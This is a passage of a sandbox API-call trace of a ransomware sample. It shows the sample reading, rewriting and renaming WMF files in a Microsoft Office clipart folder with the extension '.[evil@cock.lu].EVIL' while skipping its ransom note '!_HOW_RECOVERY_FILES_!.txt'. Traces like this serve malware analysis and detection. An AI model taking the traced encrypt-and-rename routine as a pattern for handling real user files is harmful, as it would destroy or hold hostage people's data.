_snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00898_.WMF") returned 69 [0163.127] wcscmp (_String1="PE00898_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0163.127] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00898_.WMF") returned 0x0 [0163.127] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00898_.WMF") returned 0x45 [0163.127] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00898_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00898_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0163.129] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1908, lpOverlapped=0x0) returned 1 [0163.136] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.136] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.136] _errno () returned 0x84b1160840 [0163.136] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.136] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1920, lpOverlapped=0x0) returned 1 [0163.136] CloseHandle (hObject=0x1a8) returned 1 [0163.136] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00898_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0163.136] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0163.137] __uncaught_exception () returned 0x84b1160800 [0163.137] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0163.137] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00898_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00898_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00898_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00898_.wmf.[evil@cock.lu].evil")) returned 1 [0163.138] ??_V@YAXPEAX@Z () returned 0x1 [0163.140] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00898_.WMF", dwFileAttributes=0x200) returned 0 [0163.141] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0163.141] wcsstr (_Str="PE00934_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0163.141] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00934_.WMF") returned 69 [0163.141] wcscmp (_String1="PE00934_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0163.141] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00934_.WMF") returned 0x0 [0163.141] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00934_.WMF") returned 0x45 [0163.141] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00934_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00934_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0163.143] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3100, lpOverlapped=0x0) returned 1 [0163.150] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.150] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.150] _errno () returned 0x84b1160840 [0163.150] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.150] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x3120, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3120, lpOverlapped=0x0) returned 1 [0163.150] CloseHandle (hObject=0x1a8) returned 1 [0163.150] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00934_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0163.150] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0163.150] __uncaught_exception () returned 0x84b1160800 [0163.150] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0163.151] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00934_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00934_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00934_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00934_.wmf.[evil@cock.lu].evil")) returned 1 [0163.152] ??_V@YAXPEAX@Z () returned 0x1 [0163.156] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00934_.WMF", dwFileAttributes=0x200) returned 0 [0163.161] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0163.161] wcsstr (_Str="PE00998_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0163.161] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00998_.WMF") returned 69 [0163.161] wcscmp (_String1="PE00998_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0163.161] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE00998_.WMF") returned 0x0 [0163.161] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00998_.WMF") returned 0x45 [0163.161] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00998_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00998_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0163.163] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2904, lpOverlapped=0x0) returned 1 [0163.191] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.191] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.191] _errno () returned 0x84b1160840 [0163.191] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.191] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x2920, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2920, lpOverlapped=0x0) returned 1 [0163.192] CloseHandle (hObject=0x1a8) returned 1 [0163.192] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00998_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0163.192] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0163.192] __uncaught_exception () returned 0x84b1160800 [0163.192] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0163.192] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00998_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00998_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00998_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe00998_.wmf.[evil@cock.lu].evil")) returned 1 [0163.193] ??_V@YAXPEAX@Z () returned 0x1 [0163.197] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE00998_.WMF", dwFileAttributes=0x200) returned 0 [0163.197] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0163.197] wcsstr (_Str="PE01160_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0163.197] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01160_.WMF") returned 69 [0163.197] wcscmp (_String1="PE01160_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0163.197] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE01160_.WMF") returned 0x0 [0163.197] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01160_.WMF") returned 0x45 [0163.197] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01160_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0163.199] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x984, lpOverlapped=0x0) returned 1 [0163.250] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.250] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.250] _errno () returned 0x84b1160840 [0163.250] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.250] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9a0, lpOverlapped=0x0) returned 1 [0163.250] CloseHandle (hObject=0x1a8) returned 1 [0163.250] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01160_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0163.251] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0163.251] __uncaught_exception () returned 0x84b1160800 [0163.251] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0163.251] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01160_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01160_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01160_.wmf.[evil@cock.lu].evil")) returned 1 [0163.252] ??_V@YAXPEAX@Z () returned 0x1 [0163.255] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01160_.WMF", dwFileAttributes=0x200) returned 0 [0163.255] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0163.255] wcsstr (_Str="PE01172_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0163.255] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01172_.WMF") returned 69 [0163.255] wcscmp (_String1="PE01172_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0163.255] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE01172_.WMF") returned 0x0 [0163.255] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01172_.WMF") returned 0x45 [0163.256] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0163.258] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x59c, lpOverlapped=0x0) returned 1 [0163.265] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.265] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.265] _errno () returned 0x84b1160840 [0163.265] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.265] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5a0, lpOverlapped=0x0) returned 1 [0163.265] CloseHandle (hObject=0x1a8) returned 1 [0163.265] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01172_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0163.265] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0163.266] __uncaught_exception () returned 0x84b1160800 [0163.266] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0163.266] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01172_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01172_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01172_.wmf.[evil@cock.lu].evil")) returned 1 [0163.267] ??_V@YAXPEAX@Z () returned 0x1 [0163.269] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01172_.WMF", dwFileAttributes=0x200) returned 0 [0163.269] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0163.269] wcsstr (_Str="PE01191_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0163.269] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01191_.WMF") returned 69 [0163.269] wcscmp (_String1="PE01191_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0163.269] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE01191_.WMF") returned 0x0 [0163.269] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01191_.WMF") returned 0x45 [0163.270] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01191_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0163.272] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3f9c, lpOverlapped=0x0) returned 1 [0163.309] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.309] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.309] _errno () returned 0x84b1160840 [0163.309] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.309] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x3fa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3fa0, lpOverlapped=0x0) returned 1 [0163.309] CloseHandle (hObject=0x1a8) returned 1 [0163.309] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01191_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0163.310] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0163.310] __uncaught_exception () returned 0x84b1160800 [0163.310] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0163.310] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01191_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01191_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01191_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01191_.wmf.[evil@cock.lu].evil")) returned 1 [0163.311] ??_V@YAXPEAX@Z () returned 0x1 [0163.313] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01191_.WMF", dwFileAttributes=0x200) returned 0 [0163.314] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0163.314] wcsstr (_Str="PE01661_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0163.314] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01661_.WMF") returned 69 [0163.314] wcscmp (_String1="PE01661_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0163.314] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE01661_.WMF") returned 0x0 [0163.314] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01661_.WMF") returned 0x45 [0163.314] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01661_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01661_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0163.315] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1418, lpOverlapped=0x0) returned 1 [0163.349] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.349] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.349] _errno () returned 0x84b1160840 [0163.349] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.349] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x1420, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1420, lpOverlapped=0x0) returned 1 [0163.350] CloseHandle (hObject=0x1a8) returned 1 [0163.350] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01661_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0163.350] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0163.350] __uncaught_exception () returned 0x84b1160800 [0163.350] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0163.351] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01661_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01661_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01661_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01661_.wmf.[evil@cock.lu].evil")) returned 1 [0163.351] ??_V@YAXPEAX@Z () returned 0x1 [0163.354] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01661_.WMF", dwFileAttributes=0x200) returned 0 [0163.354] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0163.354] wcsstr (_Str="PE01797_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0163.354] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01797_.WMF") returned 69 [0163.354] wcscmp (_String1="PE01797_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0163.354] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE01797_.WMF") returned 0x0 [0163.354] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01797_.WMF") returned 0x45 [0163.354] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01797_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01797_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0163.357] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xdda, lpOverlapped=0x0) returned 1 [0163.390] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.390] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0163.390] _errno () returned 0x84b1160840 [0163.390] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.390] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0xde0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xde0, lpOverlapped=0x0) returned 1 [0163.390] CloseHandle (hObject=0x1a8) returned 1 [0163.390] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01797_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0163.390] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0163.390] __uncaught_exception () returned 0x84b1160800 [0163.390] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0163.391] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01797_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01797_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01797_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe01797_.wmf.[evil@cock.lu].evil")) returned 1 [0163.391] ??_V@YAXPEAX@Z () returned 0x1 [0163.394] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE01797_.WMF", dwFileAttributes=0x200) returned 0 [0163.394] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0163.394] wcsstr (_Str="PE02120_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0163.394] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE02120_.WMF") returned 69 [0163.394] wcscmp (_String1="PE02120_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0163.394] wcsstr 